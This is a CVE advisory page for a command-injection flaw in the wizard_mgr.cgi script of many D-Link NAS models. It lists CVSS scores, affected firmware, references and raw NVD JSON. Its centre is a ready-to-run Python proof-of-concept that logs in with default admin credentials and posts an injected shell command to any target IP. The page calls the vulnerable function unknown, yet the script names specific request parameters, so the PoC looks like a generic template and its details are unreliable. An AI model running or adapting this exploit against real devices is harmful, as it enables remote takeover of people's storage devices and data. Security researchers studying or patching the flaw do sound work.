CVE-2026-4195

Description

A flaw has been found in D-Link DNS-120, DNR-202L, DNS-315L, DNS-320, DNS-320L, DNS-320LW, DNS-321, DNR-322L, DNS-323, DNS-325, DNS-326, DNS-327L, DNR-326, DNS-340L, DNS-343, DNS-345, DNS-726-4, DNS-1100-4, DNS-1200-05 and DNS-1550-04 up to 20260205. This affects an unknown function of the file /cgi-bin/wizard_mgr.cgi. Executing a manipulation can lead to command injection. The attack can be executed remotely. The exploit has been published and may be used.

CVSS Details

CVSS Score

6.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:o:dlink:dnr-202l_firmware:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:dlink:dnr-202l:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:dlink:dnr-326_firmware:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:dlink:dnr-326:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:dlink:dns-1100-4_firmware:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:dlink:dns-1100-4:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:dlink:dns-120_firmware:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:dlink:dns-120:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:dlink:dns-1200-05_firmware:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:dlink:dns-1200-05:-:*:*:*:*:*:*:* - NOT VULNERABLE

D-Link DNS-120 (固件 <= 20260205)

D-Link DNR-202L (固件 <= 20260205)

D-Link DNS-315L (固件 <= 20260205)

D-Link DNS-320/DNS-320L/DNS-320LW (固件 <= 20260205)

D-Link DNS-321 (固件 <= 20260205)

D-Link DNR-322L (固件 <= 20260205)

D-Link DNS-323 (固件 <= 20260205)

D-Link DNS-325/DNS-326 (固件 <= 20260205)

D-Link DNS-327L (固件 <= 20260205)

D-Link DNR-326 (固件 <= 20260205)

D-Link DNS-340L (固件 <= 20260205)

D-Link DNS-343 (固件 <= 20260205)

D-Link DNS-345 (固件 <= 20260205)

D-Link DNS-726-4 (固件 <= 20260205)

D-Link DNS-1100-4 (固件 <= 20260205)

D-Link DNS-1200-05 (固件 <= 20260205)

D-Link DNS-1550-04 (固件 <= 20260205)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2026-4195 PoC - D-Link NAS Command Injection
# Target: /cgi-bin/wizard_mgr.cgi

def exploit(target_ip, target_port=80, username='admin', password='admin', cmd='id'):
    """Exploit command injection in D-Link NAS devices"""
    url = f'http://{target_ip}:{target_port}/cgi-bin/wizard_mgr.cgi'
    
    # Construct malicious payload with command injection
    # Inject command via parameter manipulation
    payload = f';{cmd};#'
    
    # Authentication headers
    auth = (username, password)
    
    # Malicious request parameters
    data = {
        'action': 'wizard_submit',
        'param': payload
    }
    
    try:
        response = requests.post(url, data=data, auth=auth, timeout=10)
        print(f'Status Code: {response.status_code}')
        print(f'Response: {response.text}')
        return response
    except requests.exceptions.RequestException as e:
        print(f'Error: {e}')
        return None

if __name__ == '__main__':
    if len(sys.argv) < 2:
        print(f'Usage: python {sys.argv[0]} <target_ip> [port] [username] [password] [command]')
        sys.exit(1)
    
    target = sys.argv[1]
    port = sys.argv[2] if len(sys.argv) > 2 else 80
    user = sys.argv[3] if len(sys.argv) > 3 else 'admin'
    pwd = sys.argv[4] if len(sys.argv) > 4 else 'admin'
    cmd = sys.argv[5] if len(sys.argv) > 5 else 'id'
    
    exploit(target, port, user, pwd, cmd)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-4195
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-4195
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-4195/
[4] VulDB https://vuldb.com/cve/CVE-2026-4195
[5] https://github.com/wudipjq/my_vuln/blob/main/D-Link8/vuln_97/97.md
[6] https://vuldb.com/?ctiid.351107
[7] https://vuldb.com/?id.351107
[8] https://vuldb.com/?submit.769854
[9] https://www.dlink.com/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-4195", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:20:03.443", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw has been found in D-Link DNS-120, DNR-202L, DNS-315L, DNS-320, DNS-320L, DNS-320LW, DNS-321, DNR-322L, DNS-323, DNS-325, DNS-326, DNS-327L, DNR-326, DNS-340L, DNS-343, DNS-345, DNS-726-4, DNS-1100-4, DNS-1200-05 and DNS-1550-04 up to 20260205. This affects an unknown function of the file /cgi-bin/wizard_mgr.cgi. Executing a manipulation can lead to command injection. The attack can be executed remotely. The exploit has been published and may be used."}, {"lang": "es", "value": "Se ha encontrado una falla en D-Link DNS-120, DNR-202L, DNS-315L, DNS-320, DNS-320L, DNS-320LW, DNS-321, DNR-322L, DNS-323, DNS-325, DNS-326, DNS-327L, DNR-326, DNS-340L, DNS-343, DNS-345, DNS-726-4, DNS-1100-4, DNS-1200-05 y DNS-1550-04 hasta 20260205. Esto afecta a una función desconocida del archivo /cgi-bin/wizard_mgr.cgi. La ejecución de una manipulación puede llevar a una inyección de comandos. El ataque puede ejecutarse de forma remota. El exploit ha sido publicado y puede ser utilizado."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-77"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-77"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dlink:dnr-202l_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "2026-02-05", "matchCriteriaId": "E20A03F5-6985-4917-8E5B-48963FB62AF2"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:dlink:dnr-202l:-:*:*:*:*:*:*:*", "matchCriteriaId": "07A92F2C-16FD-4A53-8066-83FEC2818DF5"}]} ... (truncated)